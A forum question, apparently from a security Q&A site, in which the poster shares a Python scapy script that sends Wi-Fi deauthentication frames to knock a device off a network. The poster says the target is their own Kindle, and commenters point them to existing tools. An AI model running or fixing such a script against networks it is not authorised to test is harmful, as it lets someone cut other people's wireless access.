# I'm not sure if my python deauth attack isn't working properly or if I can't capture deauthentication packages with wireshark?

Tags: python, deauth-attack

I've been testing trying to deauthenticate my kindle from own wifi network. I created the following python script using scapy:

```
    from scapy.all import(
    RadioTap,
    Dot11,
    Dot11Deauth,
    sendp
    )

from argparse import ArgumentParser as AP
from sys import exit

def deauth(iface: str, count: int, bssid: str, target_mac: str):
    
    
    
    dot11 = Dot11(addr1=target_mac, addr2=bssid, addr3=bssid)
    frame = RadioTap()/dot11/Dot11Deauth()
    sendp(frame, iface=iface, count=count, inter=0.100)
    
if __name__ == "__main__":
    parser = AP(description="Perform Deauthentication attack against a computer")
    parser.add_argument("-i", "--interface",help="interface to send deauth packets from")
    parser.add_argument("-c", "--count",help="The number of deauthentication packets to send to the victim computer")
    parser.add_argument("-a", "--bssid",metavar="MAC",help="the MAC address of the access point (Airodump-ng BSSID)")
    parser.add_argument("-t", "--target-mac",metavar="MAC",help="the MAC address of the victim's computer (Airodump-ng Station)")
    args = parser.parse_args()
    if (not args.interface or not args.count 
        or not args.bssid or not args.target_mac):
        print("[-] Please specify all program arguments... run `sudo python3 deauthenticator.py -h` for help")
        exit(1)
    deauth(args.interface, int(args.count), args.bssid, args.target_mac)
```

I then run this script on my terminal:

```
sudo python3 deauthAttack.py -i en0 -c 500 -t 0.1 -a DefaultGateway'sMACaddress -t Kindle'sMACaddress
```

the script runs without issues, however my kindle doesn't disconnect from my wifi and when I use this filter this: `wlan.fc.type_subtype == 0x0c` on Wireshark to look for the package nothing gets returned.

I don't know what else to do or try. If using a MacBook Pro, with an m2pro chip.

Comment: Have you tried a pre-coded deauth tool? Else we're left trying to troubleshoot your code, which isn't what we do here.

Comment: In fact, I did a quick look and you have not coded this correctly (and this is easily google-able) How to capture packets with wireshark is not a security issue.

Comment: Thanks I will try a deauth tool